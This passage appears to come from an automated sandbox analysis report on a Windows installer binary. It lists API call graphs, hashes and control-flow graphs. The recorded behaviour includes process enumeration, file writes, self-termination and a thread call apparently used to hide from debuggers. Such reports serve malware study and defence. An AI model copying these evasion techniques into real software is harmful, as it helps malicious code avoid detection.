std::_Xinvalid_argument 97770->98245 97774 6ca06f5b 97773->97774 98247 6ca32250 30 API calls 97773->98247 98248 6ca326e0 24 API calls 4 library calls 97773->98248 98249 6cb6ca69 RaiseException 97773->98249 97775 6ca06f6e 97774->97775 98246 6ca337e0 32 API calls std::_Xinvalid_argument 97774->98246 97775->97624 97780 6ca0709e 97779->97780 97783 6ca070d1 97779->97783 98250 6ca301f0 97780->98250 97782 6ca07183 97782->97612 97783->97782 98254 6ca32250 30 API calls 97783->98254 97786 6cb74208 67 API calls 97786->97783 97787 6ca071ae 98255 6ca32340 24 API calls 97787->98255 97789 6ca071be 98256 6cb6ca69 RaiseException 97789->98256 97791 6ca071c9 97792->97612 97793->97607 97795 6cb68770 97794->97795 97796 6cb687b0 WaitForSingleObject CloseHandle CloseHandle 97795->97796 97797 6cb687a4 97795->97797 97796->97795 97797->97616 97798->97628 97800 6cb690a7 97799->97800 98302 6cb696e0 97800->98302 97802 6cb690b8 97803 6ca06ba0 104 API calls 97802->97803 97813 6cb690dc 97803->97813 97804 6cb69157 98354 6ca2e010 67 API calls 97804->98354 97806 6cb6918f std::ios_base::_Ios_base_dtor 98355 6ca2e010 67 API calls 97806->98355 97809 6cb69144 98339 6cb69280 97809->98339 97812 6cb691d2 std::ios_base::_Ios_base_dtor 97812->97667 97813->97804 97813->97809 98321 6cb69a30 97813->98321 98329 6ca43010 97813->98329 97814 6cb6914c 97815 6ca07090 77 API calls 97814->97815 97815->97804 97816->97659 97822 6cb68966 std::locale::_Setgloballocale 97817->97822 97818 6cb68a14 CloseHandle 97818->97822 97819 6cb68a64 Process32NextW 97819->97822 97820 6cb68a45 Process32FirstW 97820->97822 97821 6cb68a96 97821->97587 97822->97818 97822->97819 97822->97820 97822->97821 97823->97604 97824->97624 97826->97586 97827->97720 97828->97727 97829->97729 97830->97722 97831->97725 97833 6cb3c3a3 _Yarn __wsopen_s std::locale::_Setgloballocale 97832->97833 97834 6cb3ce3c 97833->97834 97835 6cb3cab9 CreateFileA 97833->97835 97837 6cb3b4d0 97833->97837 97834->97747 97835->97833 97839 6cb3b4e3 __wsopen_s std::locale::_Setgloballocale 97837->97839 97838 6cb3c206 WriteFile 97838->97839 97839->97838 97840 6cb3b619 WriteFile 97839->97840 97841 6cb3c377 97839->97841 97842 6cb3bc23 ReadFile 97839->97842 97840->97839 97841->97833 97842->97839 97844 6cb6a133 std::_Facet_Register 4 API calls 97843->97844 97845 6ca3207e 97844->97845 97846 6cb6aa17 43 API calls 97845->97846 97847 6ca32092 97846->97847 97883 6ca32f60 42 API calls 4 library calls 97847->97883 97849 6ca320c8 97850 6ca3210d 97849->97850 97851 6ca32136 97849->97851 97852 6ca32120 97850->97852 97884 6cb6a67e 9 API calls 2 library calls 97850->97884 97885 6ca32250 30 API calls 97851->97885 97852->97753 97855 6ca3215b 97886 6ca32340 24 API calls 97855->97886 97857 6ca32171 97887 6cb6ca69 RaiseException 97857->97887 97859 6ca3217c 97859->97753 97861 6cb6aa23 __EH_prolog3 97860->97861 97888 6cb6a5a5 97861->97888 97865 6cb6aa41 97902 6cb6aaaa 39 API calls std::locale::_Setgloballocale 97865->97902 97867 6cb6aa9c 97867->97757 97869 6cb6aa49 97903 6cb6a8a1 HeapFree GetLastError _Yarn ___std_exception_destroy 97869->97903 97871 6cb6aa5f 97894 6cb6a5d6 97871->97894 97873 6ca06d5d 97872->97873 97874 6ca31ddc 97872->97874 97873->97759 97879 6ca32250 30 API calls 97873->97879 97908 6cb6ab37 97874->97908 97878 6ca31e82 97879->97762 97880->97764 97881->97766 97882->97768 97883->97849 97884->97852 97885->97855 97886->97857 97887->97859 97889 6cb6a5b4 97888->97889 97891 6cb6a5bb 97888->97891 97904 6cb73abd 6 API calls std::_Lockit::_Lockit 97889->97904 97892 6cb6a5b9 97891->97892 97905 6cb6bc7b EnterCriticalSection 97891->97905 97892->97871 97901 6cb6a920 6 API calls 2 library calls 97892->97901 97895 6cb6a5e0 97894->97895 97896 6cb73acb 97894->97896 97897 6cb6a5f3 97895->97897 97906 6cb6bc89 LeaveCriticalSection 97895->97906 97907 6cb73aa6 LeaveCriticalSection 97896->97907 97897->97867 97899 6cb73ad2 97899->97867 97901->97865 97902->97869 97903->97871 97904->97892 97905->97892 97906->97897 97907->97899 97909 6cb6ab40 97908->97909 97910 6ca31dea 97909->97910 97917 6cb7343a 97909->97917 97910->97873 97916 6cb6fc53 18 API calls __Getctype 97910->97916 97912 6cb6ab8c 97912->97910 97928 6cb73148 65 API calls 97912->97928 97914 6cb6aba7 97914->97910 97929 6cb74208 97914->97929 97916->97878 97918 6cb73445 __wsopen_s 97917->97918 97919 6cb73458 97918->97919 97920 6cb73478 97918->97920 97954 6cb73810 18 API calls __Getctype 97919->97954 97924 6cb73468 97920->97924 97940 6cb7e4fc 97920->97940 97924->97912 97928->97914 97930 6cb74214 __wsopen_s 97929->97930 97931 6cb74233 97930->97931 97932 6cb7421e 97930->97932 97937 6cb7422e 97931->97937 98135 6cb6fc99 EnterCriticalSection 97931->98135 98150 6cb73810 18 API calls __Getctype 97932->98150 97934 6cb74250 98136 6cb7428c 97934->98136 97937->97910 97938 6cb7425b 98151 6cb74282 LeaveCriticalSection 97938->98151 97941 6cb7e508 __wsopen_s 97940->97941 97956 6cb73a8f EnterCriticalSection 97941->97956 97943 6cb7e516 97957 6cb7e5a0 97943->97957 97948 6cb7e662 97949 6cb7e781 97948->97949 97981 6cb7e804 97949->97981 97952 6cb734bc 97955 6cb734e5 LeaveCriticalSection 97952->97955 97954->97924 97955->97924 97956->97943 97958 6cb7e5c3 97957->97958 97959 6cb7e61b 97958->97959 97966 6cb7e523 97958->97966 97974 6cb6fc99 EnterCriticalSection 97958->97974 97975 6cb6fcad LeaveCriticalSection 97958->97975 97976 6cb7a8d5 EnterCriticalSection LeaveCriticalSection HeapAlloc __Getctype std::_Facet_Register 97959->97976 97962 6cb7e624 97977 6cb77eab HeapFree GetLastError _free 97962->97977 97964 6cb7e62d 97964->97966 97978 6cb7a30f 6 API calls std::_Lockit::_Lockit 97964->97978 97971 6cb7e55c 97966->97971 97967 6cb7e64c 97979 6cb6fc99 EnterCriticalSection 97967->97979 97970 6cb7e65f 97970->97966 97980 6cb73aa6 LeaveCriticalSection 97971->97980 97973 6cb73493 97973->97924 97973->97948 97974->97958 97975->97958 97976->97962 97977->97964 97978->97967 97979->97970 97980->97973 97983 6cb7e823 97981->97983 97982 6cb7e84b 97992 6cb7e96b 97982->97992 97998 6cb87598 37 API calls __Getctype 97982->97998 97983->97982 97984 6cb7e836 97983->97984 97997 6cb73810 18 API calls __Getctype 97984->97997 97986 6cb7e797 97986->97952 97994 6cb876ce 97986->97994 97989 6cb7e9bb 97989->97992 97999 6cb87598 37 API calls __Getctype 97989->97999 97991 6cb7e9d9 97991->97992 98000 6cb87598 37 API calls __Getctype 97991->98000 97992->97986 98001 6cb73810 18 API calls __Getctype 97992->98001 98002 6cb87a86 97994->98002 97997->97986 97998->97989 97999->97991 98000->97992 98001->97986 98004 6cb87a92 __wsopen_s 98002->98004 98003 6cb87a99 98020 6cb73810 18 API calls __Getctype 98003->98020 98004->98003 98005 6cb87ac4 98004->98005 98011 6cb876ee 98005->98011 98010 6cb876e9 98010->97952 98022 6cb73dbb 98011->98022 98017 6cb87724 98018 6cb87756 98017->98018 98062 6cb77eab HeapFree GetLastError _free 98017->98062 98021 6cb87b1b LeaveCriticalSection __wsopen_s 98018->98021 98020->98010 98021->98010 98063 6cb6f3db 98022->98063 98025 6cb73ddf 98027 6cb6f4e6 98025->98027 98072 6cb6f53e 98027->98072 98029 6cb6f4fe 98029->98017 98030 6cb8775c 98029->98030 98087 6cb87bdc 98030->98087 98035 6cb8778e __dosmaperr 98035->98017 98037 6cb87882 GetFileType 98038 6cb8788d GetLastError 98037->98038 98039 6cb878d4 98037->98039 98116 6cb730e2 __dosmaperr _free 98038->98116 98117 6cb84ea0 SetStdHandle __dosmaperr __wsopen_s 98039->98117 98040 6cb87857 GetLastError 98040->98035 98042 6cb87805 98042->98037 98042->98040 98115 6cb87b47 CreateFileW 98042->98115 98043 6cb8789b CloseHandle 98043->98035 98059 6cb878c4 98043->98059 98046 6cb8784a 98046->98037 98046->98040 98047 6cb878f5 98048 6cb87941 98047->98048 98118 6cb87d56 70 API calls 2 library calls 98047->98118 98052 6cb87948 98048->98052 98132 6cb87e00 70 API calls 2 library calls 98048->98132 98051 6cb87976 98051->98052 98053 6cb87984 98051->98053 98119 6cb7f015 98052->98119 98053->98035 98055 6cb87a00 CloseHandle 98053->98055 98133 6cb87b47 CreateFileW 98055->98133 98057 6cb87a2b 98058 6cb87a35 GetLastError 98057->98058 98057->98059 98060 6cb87a41 __dosmaperr 98058->98060 98059->98035 98134 6cb84e0f SetStdHandle __dosmaperr __wsopen_s 98060->98134 98062->98018 98064 6cb6f3f2 98063->98064 98065 6cb6f3fb 98063->98065 98064->98025 98071 6cb7a0c5 5 API calls std::_Lockit::_Lockit 98064->98071 98065->98064 98066 6cb780a2 __Getctype 37 API calls 98065->98066 98067 6cb6f41b 98066->98067 98068 6cb78618 __Getctype 37 API calls 98067->98068 98069 6cb6f431 98068->98069 98070 6cb78645 __cftoe 37 API calls 98069->98070 98070->98064 98071->98025 98073 6cb6f566 98072->98073 98074 6cb6f54c 98072->98074 98075 6cb6f58c 98073->98075 98076 6cb6f56d 98073->98076 98077 6cb6f4cc __wsopen_s HeapFree GetLastError 98074->98077 98079 6cb77f33 __fassign MultiByteToWideChar 98075->98079 98078 6cb6f556 __dosmaperr 98076->98078 98080 6cb6f48d __wsopen_s HeapFree GetLastError 98076->98080 98077->98078 98078->98029 98081 6cb6f59b 98079->98081 98080->98078 98082 6cb6f5a2 GetLastError 98081->98082 98083 6cb6f48d __wsopen_s HeapFree GetLastError 98081->98083 98085 6cb6f5c8 98081->98085 98082->98078 98083->98085 98084 6cb77f33 __fassign MultiByteToWideChar 98086 6cb6f5df 98084->98086 98085->98078 98085->98084 98086->98078 98086->98082 98088 6cb87c17 98087->98088 98090 6cb87bfd 98087->98090 98089 6cb87b6c __wsopen_s 18 API calls 98088->98089 98094 6cb87c4f 98089->98094 98090->98088 98091 6cb73810 __Getctype 18 API calls 98090->98091 98091->98088 98092 6cb87c7e 98093 6cb89001 __wsopen_s 18 API calls 98092->98093 98099 6cb87779 98092->98099 98095 6cb87ccc 98093->98095 98094->98092 98096 6cb73810 __Getctype 18 API calls 98094->98096 98097 6cb87d49 98095->98097 98095->98099 98096->98092 98098 6cb7383d __Getctype 11 API calls 98097->98098 98100 6cb87d55 98098->98100 98099->98035 98101 6cb84cfc 98099->98101 98102 6cb84d08 __wsopen_s 98101->98102 98103 6cb73a8f std::_Lockit::_Lockit EnterCriticalSection 98102->98103 98106 6cb84d0f 98103->98106 98104 6cb84d56 98105 6cb84e06 __wsopen_s LeaveCriticalSection 98104->98105 98108 6cb84d76 98105->98108 98106->98104 98107 6cb84d34 98106->98107 98111 6cb84da3 EnterCriticalSection 98106->98111 98109 6cb84f32 __wsopen_s 11 API calls 98107->98109 98108->98035 98114 6cb87b47 CreateFileW 98108->98114 98110 6cb84d39 98109->98110 98110->98104 98113 6cb85080 __wsopen_s EnterCriticalSection 98110->98113 98111->98104 98112 6cb84db0 LeaveCriticalSection 98111->98112 98112->98106 98113->98104 98114->98042 98115->98046 98116->98043 98117->98047 98118->98048 98120 6cb84c92 __wsopen_s 18 API calls 98119->98120 98121 6cb7f025 98120->98121 98122 6cb7f02b 98121->98122 98124 6cb84c92 __wsopen_s 18 API calls 98121->98124 98131 6cb7f05d 98121->98131 98123 6cb84e0f __wsopen_s SetStdHandle 98122->98123 98130 6cb7f083 __dosmaperr 98123->98130 98126 6cb7f054 98124->98126 98125 6cb84c92 __wsopen_s 18 API calls 98127 6cb7f069 CloseHandle 98125->98127 98128 6cb84c92 __wsopen_s 18 API calls 98126->98128 98127->98122 98129 6cb7f075 GetLastError 98127->98129 98128->98131 98129->98122 98130->98035 98131->98122 98131->98125 98132->98051 98133->98057 98134->98059 98135->97934 98137 6cb742ae 98136->98137 98138 6cb74299 98136->98138 98141 6cb742a9 98137->98141 98152 6cb743a9 98137->98152 98174 6cb73810 18 API calls __Getctype 98138->98174 98141->97938 98146 6cb742d1 98167 6cb7ef88 98146->98167 98148 6cb742d7 98148->98141 98175 6cb77eab HeapFree GetLastError _free 98148->98175 98150->97937 98151->97937 98153 6cb742c3 98152->98153 98154 6cb743c1 98152->98154 98158 6cb7be2e 98153->98158 98154->98153 98155 6cb7d350 18 API calls 98154->98155 98156 6cb743df 98155->98156 98176 6cb7f25c 98156->98176 98159 6cb7be45 98158->98159 98160 6cb742cb 98158->98160 98159->98160 98232 6cb77eab HeapFree GetLastError _free 98159->98232 98162 6cb7d350 98160->98162 98163 6cb7d371 98162->98163 98164 6cb7d35c 98162->98164 98163->98146 98233 6cb73810 18 API calls __Getctype 98164->98233 98166 6cb7d36c 98166->98146 98168 6cb7efae 98167->98168 98172 6cb7ef99 __dosmaperr 98167->98172 98169 6cb7efd5 98168->98169 98171 6cb7eff7 __dosmaperr 98168->98171 98234 6cb7f0b1 98169->98234 98242 6cb73810 18 API calls __Getctype 98171->98242 98172->98148 98174->98141 98175->98141 98177 6cb7f268 __wsopen_s 98176->98177 98178 6cb7f2ba 98177->98178 98180 6cb7f270 __dosmaperr 98177->98180 98181 6cb7f323 __dosmaperr 98177->98181 98187 6cb85080 EnterCriticalSection 98178->98187 98180->98153 98217 6cb73810 18 API calls __Getctype 98181->98217 98182 6cb7f2c0 98185 6cb7f2dc __dosmaperr 98182->98185 98188 6cb7f34e 98182->98188 98216 6cb7f31b LeaveCriticalSection __wsopen_s 98185->98216 98187->98182 98189 6cb7f370 98188->98189 98215 6cb7f38c __dosmaperr 98188->98215 98190 6cb7f3c4 98189->98190 98192 6cb7f374 __dosmaperr 98189->98192 98191 6cb7f3d7 98190->98191 98226 6cb7e359 20 API calls __wsopen_s 98190->98226 98218 6cb7f530 98191->98218 98225 6cb73810 18 API calls __Getctype 98192->98225 98197 6cb7f3ed 98201 6cb7f416 98197->98201 98202 6cb7f3f1 98197->98202 98198 6cb7f42c 98199 6cb7f485 WriteFile 98198->98199 98200 6cb7f440 98198->98200 98203 6cb7f4a9 GetLastError 98199->98203 98199->98215 98205 6cb7f475 98200->98205 98206 6cb7f44b 98200->98206 98228 6cb7f5a1 43 API calls 5 library calls 98201->98228 98202->98215 98227 6cb7f94b 6 API calls __wsopen_s 98202->98227 98203->98215 98231 6cb7f9b3 7 API calls 2 library calls 98205->98231 98207 6cb7f465 98206->98207 98208 6cb7f450 98206->98208 98230 6cb7fb77 8 API calls 3 library calls 98207->98230 98211 6cb7f455 98208->98211 98208->98215 98229 6cb7fa8e 7 API calls 2 library calls 98211->98229 98213 6cb7f463 98213->98215 98215->98185 98216->98180 98217->98180 98219 6cb850d5 __wsopen_s 18 API calls 98218->98219 98220 6cb7f541 98219->98220 98221 6cb7f3e8 98220->98221 98222 6cb780a2 __Getctype 37 API calls 98220->98222 98221->98197 98221->98198 98223 6cb7f564 98222->98223 98223->98221 98224 6cb7f57e GetConsoleMode 98223->98224 98224->98221 98225->98215 98226->98191 98227->98215 98228->98215 98229->98213 98230->98213 98231->98213 98232->98160 98233->98166 98235 6cb7f0bd __wsopen_s 98234->98235 98243 6cb85080 EnterCriticalSection 98235->98243 98237 6cb7f0cb 98238 6cb7f0f8 98237->98238 98239 6cb7f015 __wsopen_s 21 API calls 98237->98239 98244 6cb7f131 LeaveCriticalSection __wsopen_s 98238->98244 98239->98238 98241 6cb7f11a 98241->98172 98242->98172 98243->98237 98244->98241 98245->97773 98246->97775 98247->97773 98248->97773 98249->97773 98251 6ca3022e 98250->98251 98252 6ca070c4 98251->98252 98257 6cb74ecb 98251->98257 98252->97786 98254->97787 98255->97789 98256->97791 98258 6cb74ef6 98257->98258 98259 6cb74ed9 98257->98259 98258->98251 98259->98258 98260 6cb74ee6 98259->98260 98261 6cb74efa 98259->98261 98273 6cb73810 18 API calls __Getctype 98260->98273 98265 6cb750f2 98261->98265 98266 6cb750fe __wsopen_s 98265->98266 98274 6cb6fc99 EnterCriticalSection 98266->98274 98268 6cb7510c 98275 6cb750af 98268->98275 98272 6cb74f2c 98272->98251 98273->98258 98274->98268 98283 6cb7bc96 98275->98283 98281 6cb750e9 98282 6cb75141 LeaveCriticalSection 98281->98282 98282->98272 98284 6cb7d350 18 API calls 98283->98284 98285 6cb7bca7 98284->98285 98286 6cb850d5 __wsopen_s 18 API calls 98285->98286 98287 6cb7bcad __wsopen_s 98286->98287 98288 6cb750c3 98287->98288 98300 6cb77eab HeapFree GetLastError _free 98287->98300 98290 6cb74f2e 98288->98290 98292 6cb74f40 98290->98292 98295 6cb74f5e 98290->98295 98291 6cb74f4e 98301 6cb73810 18 API calls __Getctype 98291->98301 98292->98291 98294 6cb74f76 _Yarn 98292->98294 98292->98295 98294->98295 98296 6cb743a9 62 API calls 98294->98296 98297 6cb7d350 18 API calls 98294->98297 98298 6cb7f25c __wsopen_s 62 API calls 98294->98298 98299 6cb7bd49 62 API calls 98295->98299 98296->98294 98297->98294 98298->98294 98299->98281 98300->98288 98301->98295 98303 6cb69715 98302->98303 98304 6ca32020 52 API calls 98303->98304 98305 6cb697b6 98304->98305 98306 6cb6a133 std::_Facet_Register 4 API calls 98305->98306 98307 6cb697ee 98306->98307 98308 6cb6aa17 43 API calls 98307->98308 98309 6cb69802 98308->98309 98310 6ca31d90 89 API calls 98309->98310 98311 6cb698ab 98310->98311 98312 6cb698dc 98311->98312 98356 6ca32250 30 API calls 98311->98356 98312->97802 98314 6cb69916 98357 6ca326e0 24 API calls 4 library calls 98314->98357 98316 6cb69928 98358 6cb6ca69 RaiseException 98316->98358 98318 6cb6993d 98359 6ca2e010 67 API calls 98318->98359 98320 6cb6994f 98320->97802 98322 6cb69a7d 98321->98322 98360 6cb69c90 98322->98360 98324 6cb69b6c 98324->97813 98327 6cb69a95 98327->98324 98378 6ca32250 30 API calls 98327->98378 98379 6ca326e0 24 API calls 4 library calls 98327->98379 98380 6cb6ca69 RaiseException 98327->98380 98330 6ca4304f 98329->98330 98333 6ca43063 98330->98333 98389 6ca33560 32 API calls std::_Xinvalid_argument 98330->98389 98336 6ca4311e 98333->98336 98391 6ca32250 30 API calls 98333->98391 98392 6ca326e0 24 API calls 4 library calls 98333->98392 98393 6cb6ca69 RaiseException 98333->98393 98335 6ca43131 98335->97813 98336->98335 98390 6ca337e0 32 API calls std::_Xinvalid_argument 98336->98390 98340 6cb6928e 98339->98340 98341 6cb692c1 98339->98341 98342 6ca301f0 64 API calls 98340->98342 98343 6cb69373 98341->98343 98394 6ca32250 30 API calls 98341->98394 98344 6cb692b4 98342->98344 98343->97814 98345 6cb74208 67 API calls 98344->98345 98345->98341 98347 6cb6939e 98395 6ca32340 24 API calls 98347->98395 98349 6cb693ae 98396 6cb6ca69 RaiseException 98349->98396 98351 6cb693b9 98397 6ca2e010 67 API calls 98351->98397 98353 6cb69412 std::ios_base::_Ios_base_dtor 98353->97814 98354->97806 98355->97812 98356->98314 98357->98316 98358->98318 98359->98320 98361 6cb69ccc 98360->98361 98362 6cb69cf8 98360->98362 98376 6cb69cf1 98361->98376 98383 6ca32250 30 API calls 98361->98383 98367 6cb69d09 98362->98367 98381 6ca33560 32 API calls std::_Xinvalid_argument 98362->98381 98365 6cb69ed8 98384 6ca32340 24 API calls 98365->98384 98367->98376 98382 6ca32f60 42 API calls 4 library calls 98367->98382 98368 6cb69ee7 98385 6cb6ca69 RaiseException 98368->98385 98372 6cb69f17 98387 6ca32340 24 API calls 98372->98387 98374 6cb69f2d 98388 6cb6ca69 RaiseException 98374->98388 98376->98327 98377 6cb69d43 98377->98376 98386 6ca32250 30 API calls 98377->98386 98378->98327 98379->98327 98380->98327 98381->98367 98382->98377 98383->98365 98384->98368 98385->98377 98386->98372 98387->98374 98388->98376 98389->98333 98390->98335 98391->98333 98392->98333 98393->98333 98394->98347 98395->98349 98396->98351 98397->98353 98398 6c9ff150 98400 6c9fefbe 98398->98400 98399 6c9ff243 CreateFileA 98403 6c9ff2a7 98399->98403 98400->98399 98401 6ca002ca 98402 6ca002ac GetCurrentProcess TerminateProcess 98402->98401 98403->98401 98403->98402

                                      Executed Functions

                                      Function 6C9E4754 Relevance: 69.2, APIs: 28, Strings: 1, Instructions: 18471COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: _strlen
                                      • String ID: HR^
                                      • API String ID: 4218353326-1341859651
                                      • Opcode ID: bcba25816ed872ca2abcf86a0838e174554bba07e80a525ee37cc8d15ea4147f
                                      • Instruction ID: 5eb6ec1a67c50d132094c38451ae99f080db0067f9b56a186e6c319187753ac7
                                      • Opcode Fuzzy Hash: bcba25816ed872ca2abcf86a0838e174554bba07e80a525ee37cc8d15ea4147f
                                      • Instruction Fuzzy Hash: D574E571644B028FC729CF28C8D0695B7F2FF99318B198A6DC0A68BB55E774F54ACB40
                                      Function 6CB68930 Relevance: 6.1, APIs: 4, Instructions: 95processCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 4604 6cb68930-6cb68964 CreateToolhelp32Snapshot 4605 6cb68980-6cb68989 4604->4605 4606 6cb689d0-6cb689d5 4605->4606 4607 6cb6898b-6cb68990 4605->4607 4610 6cb689d7-6cb689dc 4606->4610 4611 6cb68a34-6cb68a62 call 6cb6f010 Process32FirstW 4606->4611 4608 6cb68992-6cb68997 4607->4608 4609 6cb68a0d-6cb68a12 4607->4609 4615 6cb68966-6cb68973 4608->4615 4616 6cb68999-6cb6899e 4608->4616 4612 6cb68a14-6cb68a2f CloseHandle 4609->4612 4613 6cb68a8b-6cb68a90 4609->4613 4617 6cb68a64-6cb68a71 Process32NextW 4610->4617 4618 6cb689e2-6cb689e7 4610->4618 4620 6cb68a76-6cb68a86 4611->4620 4612->4605 4613->4605 4621 6cb68a96-6cb68aa4 4613->4621 4615->4605 4616->4605 4622 6cb689a0-6cb689ca call 6cb762f5 4616->4622 4617->4620 4618->4605 4623 6cb689e9-6cb68a08 4618->4623 4620->4605 4622->4605 4623->4605
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6CB6893E
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.2285460733.000000006C9E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9E0000, based on PE: true
                                      • Associated: 00000006.00000002.2285433898.000000006C9E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286843733.000000006CB8B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2286963002.000000006CB9B000.00000008.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287710467.000000006CC66000.00000004.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2287749371.000000006CC6C000.00000020.00000001.01000000.00000009.sdmpDownload File
                                      • Associated: 00000006.00000002.2288439828.000000006CD57000.00000002.00000001.01000000.00000009.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_6c9e0000_#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                                      Similarity
                                      • API ID: CreateSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 3332741929-0
                                      • Opcode ID: c62689ea678a7f241ece43686757bb0282a83ab5f056c5421bc278ed67b1ffe3
                                      • Instruction ID: 33a1184b2948f0d402244d3d4f4e984fb462691f7ae018a1e3c73fd326652846
                                      • Opcode Fuzzy Hash: c62689ea678a7f241ece43686757bb0282a83ab5f056c5421bc278ed67b1ffe3
                                      • Instruction Fuzzy Hash: B43180B020A3419FD7119F5AD88475ABBE4EF8A708F145D2EF4C9D6BA0D732D8848B53
                                      Function 6C9E3886 Relevance: 3.6, APIs: 2, Instructions: 573COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 4877 6c9e3886-6c9e388e 4878 6c9e3894-6c9e3896 4877->4878 4879 6c9e3970-6c9e397d 4877->4879 4878->4879 4880 6c9e389c-6c9e38b9 4878->4880 4881 6c9e397f-6c9e3989 4879->4881 4882 6c9e39f1-6c9e39f8 4879->4882 4885 6c9e38c0-6c9e38c1 4880->4885 4881->4880 4886 6c9e398f-6c9e3994 4881->4886 4883 6c9e39fe-6c9e3a03 4882->4883 4884 6c9e3ab5-6c9e3aba 4882->4884 4889 6c9e3a09-6c9e3a2f 4883->4889 4890 6c9e38d2-6c9e38d4 4883->4890 4884->4880 4892 6c9e3ac0-6c9e3ac7 4884->4892 4891 6c9e395e 4885->4891 4887 6c9e399a-6c9e399f 4886->4887 4888 6c9e3b16-6c9e3b18 4886->4888 4893 6c9e383b-6c9e3855 call 6cb32a20 call 6cb32a30 4887->4893 4894 6c9e39a5-6c9e39bf 4887->4894 4888->4885 4895 6c9e38f8-6c9e3955 4889->4895 4896 6c9e3a35-6c9e3a3a 4889->4896 4897 6c9e3957-6c9e395c 4890->4897 4898 6c9e3960-6c9e3964 4891->4898 4892->4885 4899 6c9e3acd-6c9e3ad6 4892->4899 4905 6c9e3860-6c9e3885 4893->4905 4900 6c9e3a5a-6c9e3a5d 4894->4900 4895->4897 4901 6c9e3b1d-6c9e3b22 4896->4901 4902 6c9e3a40-6c9e3a57 4896->4902 4897->4891 4904 6c9e396a 4898->4904 4898->4905 4899->4888 4906 6c9e3ad8-6c9e3aeb 4899->4906 4910 6c9e3aa9-6c9e3ab0 4900->4910 4908 6c9e3b49-6c9e3b50 4901->4908 4909 6c9e3b24-6c9e3b44 4901->4909 4902->4900 4912 6c9e3ba1-6c9e3bb6 4904->4912 4905->4877 4906->4895 4913 6c9e3af1-6c9e3af8 4906->4913 4908->4885 4916 6c9e3b56-6c9e3b5d 4908->4916 4909->4910 4910->4898 4917 6c9e3bc0-6c9e3bda call 6cb32a20 call 6cb32a30 4912->4917 4919 6c9e3afa-6c9e3aff 4913->4919 4920 6c9e3b62-6c9e3b85 4913->4920 4916->4898 4928 6c9e3be0-6c9e3bfe 4917->4928 4919->4897 4920->4895 4922 6c9e3b8b 4920->4922 4922->4912 4931 6c9e3e7b 4928->4931 4932 6c9e3c04-6c9e3c11 4928->4932 4935 6c9e3e81-6c9e3ee0 call 6c9e3750 GetCurrentThread NtSetInformationThread 4931->4935 4933 6c9e3c17-6c9e3c20 4932->4933 4934 6c9e3ce0-6c9e3cea 4932->4934 4936 6c9e3c26-6c9e3c2d 4933->4936 4937 6c9e3dc5 4933->4937 4938 6c9e3cec-6c9e3d0c 4934->4938 4939 6c9e3d3a-6c9e3d3c 4934->4939 4952 6c9e3eea-6c9e3f04 call 6cb32a20 call 6cb32a30 4935->4952 4941 6c9e3dc3 4936->4941 4942 6c9e3c33-6c9e3c3a 4936->4942 4947 6c9e3dc6 4937->4947 4943 6c9e3d90-6c9e3d95 4938->4943 4944 6c9e3d3e-6c9e3d45 4939->4944 4945 6c9e3d70-6c9e3d8d 4939->4945 4941->4937 4948 6c9e3e26-6c9e3e2b 4942->4948 4949 6c9e3c40-6c9e3c5b 4942->4949 4953 6c9e3dba-6c9e3dc1 4943->4953 4954 6c9e3d97-6c9e3db8 4943->4954 4951 6c9e3d50-6c9e3d57 4944->4951 4945->4943 4950 6c9e3dc8-6c9e3dcc 4947->4950 4956 6c9e3c7b-6c9e3cd0 4948->4956 4957 6c9e3e31 4948->4957 4958 6c9e3e1b-6c9e3e24 4949->4958 4950->4928 4959 6c9e3dd2 4950->4959 4951->4947 4971 6c9e3f75-6c9e3fa1 4952->4971 4953->4941 4955 6c9e3dd7-6c9e3ddc 4953->4955 4954->4937 4961 6c9e3dde-6c9e3e17 4955->4961 4962 6c9e3e36-6c9e3e3d 4955->4962 4956->4951 4957->4917 4958->4950 4963 6c9e3e76-6c9e3e79 4958->4963 4959->4963 4961->4958 4966 6c9e3e3f-6c9e3e5a 4962->4966 4967 6c9e3e5c-6c9e3e5f 4962->4967 4963->4935 4966->4958 4967->4956 4969 6c9e3e65-6c9e3e69 4967->4969 4969->4950 4969->4963 4975 6c9e3fa3-6c9e3fa8 4971->4975 4976 6c9e4020-6c9e4026 4971->4976 4979 6c9e3fae-6c9e3fcf 4975->4979 4980 6c9e407c-6c9e4081 4975->4980 4977 6c9e402c-6c9e403c 4976->4977 4978 6c9e3f06-6c9e3f35 4976->4978 4981 6c9e403e-6c9e4058 4977->4981 4982 6c9e40b3-6c9e40b8 4977->4982 4985 6c9e3f38-6c9e3f61 4978->4985 4983 6c9e40aa-6c9e40ae 4979->4983 4980->4983 4984 6c9e4083-6c9e408a 